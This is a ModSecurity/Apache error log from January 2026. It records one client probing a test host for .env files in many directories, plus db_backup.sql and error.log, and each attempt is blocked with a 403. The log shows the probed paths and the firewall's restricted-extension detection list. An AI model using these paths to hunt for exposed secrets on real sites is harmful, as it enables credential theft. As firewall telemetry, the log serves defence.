[Mon Jan 12 12:28:25.562673 2026] [:error] [pid 1365300] [client 13.40.27.204:43482] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWTa2dlKlmIJBGbQbR78SAAAAAs"]
[Mon Jan 12 12:28:25.562858 2026] [:error] [pid 1365300] [client 13.40.27.204:43482] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWTa2dlKlmIJBGbQbR78SAAAAAs"]
[Mon Jan 12 12:28:25.563041 2026] [:error] [pid 1365300] [client 13.40.27.204:43482] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWTa2dlKlmIJBGbQbR78SAAAAAs"]
[Mon Jan 12 12:28:25.658056 2026] [:error] [pid 1358564] [client 13.40.27.204:43514] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWTa2R_UgGRJ4jDk47tQXQAAAAY"]
[Mon Jan 12 12:28:25.658262 2026] [:error] [pid 1358564] [client 13.40.27.204:43514] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWTa2R_UgGRJ4jDk47tQXQAAAAY"]
[Mon Jan 12 12:28:25.658435 2026] [:error] [pid 1358564] [client 13.40.27.204:43514] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWTa2R_UgGRJ4jDk47tQXQAAAAY"]
[Mon Jan 12 12:28:25.751391 2026] [authz_core:error] [pid 1362231] [client 13.40.27.204:43544] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Mon Jan 12 12:28:25.852215 2026] [:error] [pid 1356126] [client 13.40.27.204:43572] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWTa2Tv8xyMiuvwfNnljwgAAAAU"]
[Mon Jan 12 12:28:25.852427 2026] [:error] [pid 1356126] [client 13.40.27.204:43572] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWTa2Tv8xyMiuvwfNnljwgAAAAU"]
[Mon Jan 12 12:28:25.852583 2026] [:error] [pid 1356126] [client 13.40.27.204:43572] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWTa2Tv8xyMiuvwfNnljwgAAAAU"]
[Mon Jan 12 12:28:25.943385 2026] [:error] [pid 1355923] [client 13.40.27.204:43600] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWTa2SE1xEBhFyXickXrdgAAAAA"]
[Mon Jan 12 12:28:25.943598 2026] [:error] [pid 1355923] [client 13.40.27.204:43600] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWTa2SE1xEBhFyXickXrdgAAAAA"]
[Mon Jan 12 12:28:25.943757 2026] [:error] [pid 1355923] [client 13.40.27.204:43600] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWTa2SE1xEBhFyXickXrdgAAAAA"]
[Mon Jan 12 12:28:26.041561 2026] [:error] [pid 1355926] [client 13.40.27.204:43634] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWTa2sC2y5bYy1r2HoPzDQAAAAM"]
[Mon Jan 12 12:28:26.041863 2026] [:error] [pid 1355926] [client 13.40.27.204:43634] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWTa2sC2y5bYy1r2HoPzDQAAAAM"]
[Mon Jan 12 12:28:26.042085 2026] [:error] [pid 1355926] [client 13.40.27.204:43634] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWTa2sC2y5bYy1r2HoPzDQAAAAM"]
[Mon Jan 12 12:28:26.143137 2026] [:error] [pid 1362233] [client 13.40.27.204:43666] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWTa2n2DuVtAKraH1YONagAAAAk"]
[Mon Jan 12 12:28:26.143466 2026] [:error] [pid 1362233] [client 13.40.27.204:43666] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWTa2n2DuVtAKraH1YONagAAAAk"]
[Mon Jan 12 12:28:26.143619 2026] [:error] [pid 1362233] [client 13.40.27.204:43666] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWTa2n2DuVtAKraH1YONagAAAAk"]
[Mon Jan 12 12:28:26.245159 2026] [:error] [pid 1355925] [client 13.40.27.204:43700] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWTa2k7thAymmecRvtl0MgAAAAI"]
[Mon Jan 12 12:28:26.245369 2026] [:error] [pid 1355925] [client 13.40.27.204:43700] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWTa2k7thAymmecRvtl0MgAAAAI"]
[Mon Jan 12 12:28:26.245517 2026] [:error] [pid 1355925] [client 13.40.27.204:43700] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWTa2k7thAymmecRvtl0MgAAAAI"]
[Mon Jan 12 12:28:26.346702 2026] [:error] [pid 1355924] [client 13.40.27.204:43730] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWTa2tIpinFXoPzDav5wWAAAAAE"]
[Mon Jan 12 12:28:26.346936 2026] [:error] [pid 1355924] [client 13.40.27.204:43730] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWTa2tIpinFXoPzDav5wWAAAAAE"]
[Mon Jan 12 12:28:26.347095 2026] [:error] [pid 1355924] [client 13.40.27.204:43730] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWTa2tIpinFXoPzDav5wWAAAAAE"]
[Mon Jan 12 12:28:26.440114 2026] [:error] [pid 1365300] [client 13.40.27.204:43766] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWTa2tlKlmIJBGbQbR78SQAAAAs"]
[Mon Jan 12 12:28:26.441253 2026] [:error] [pid 1365300] [client 13.40.27.204:43766] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWTa2tlKlmIJBGbQbR78SQAAAAs"]
[Mon Jan 12 12:28:26.441451 2026] [:error] [pid 1365300] [client 13.40.27.204:43766] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWTa2tlKlmIJBGbQbR78SQAAAAs"]
[Mon Jan 12 12:28:26.541896 2026] [:error] [pid 1358564] [client 13.40.27.204:43806] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWTa2h_UgGRJ4jDk47tQXgAAAAY"]
[Mon Jan 12 12:28:26.542118 2026] [:error] [pid 1358564] [client 13.40.27.204:43806] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWTa2h_UgGRJ4jDk47tQXgAAAAY"]
[Mon Jan 12 12:28:26.542286 2026] [:error] [pid 1358564] [client 13.40.27.204:43806] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWTa2h_UgGRJ4jDk47tQXgAAAAY"]
[Mon Jan 12 12:28:26.641959 2026] [:error] [pid 1362231] [client 13.40.27.204:43838] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWTa2suCkgRo958sQERiCQAAAAc"]
[Mon Jan 12 12:28:26.642260 2026] [:error] [pid 1362231] [client 13.40.27.204:43838] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWTa2suCkgRo958sQERiCQAAAAc"]
[Mon Jan 12 12:28:26.642438 2026] [:error] [pid 1362231] [client 13.40.27.204:43838] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWTa2suCkgRo958sQERiCQAAAAc"]
[Mon Jan 12 12:28:26.747341 2026] [:error] [pid 1356126] [client 13.40.27.204:43864] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWTa2jv8xyMiuvwfNnljwwAAAAU"]
[Mon Jan 12 12:28:26.747553 2026] [:error] [pid 1356126] [client 13.40.27.204:43864] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWTa2jv8xyMiuvwfNnljwwAAAAU"]
[Mon Jan 12 12:28:26.747703 2026] [:error] [pid 1356126] [client 13.40.27.204:43864] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWTa2jv8xyMiuvwfNnljwwAAAAU"]
[Mon Jan 12 12:28:26.847958 2026] [:error] [pid 1355923] [client 13.40.27.204:43890] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWTa2iE1xEBhFyXickXrdwAAAAA"]
[Mon Jan 12 12:28:26.848175 2026] [:error] [pid 1355923] [client 13.40.27.204:43890] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWTa2iE1xEBhFyXickXrdwAAAAA"]
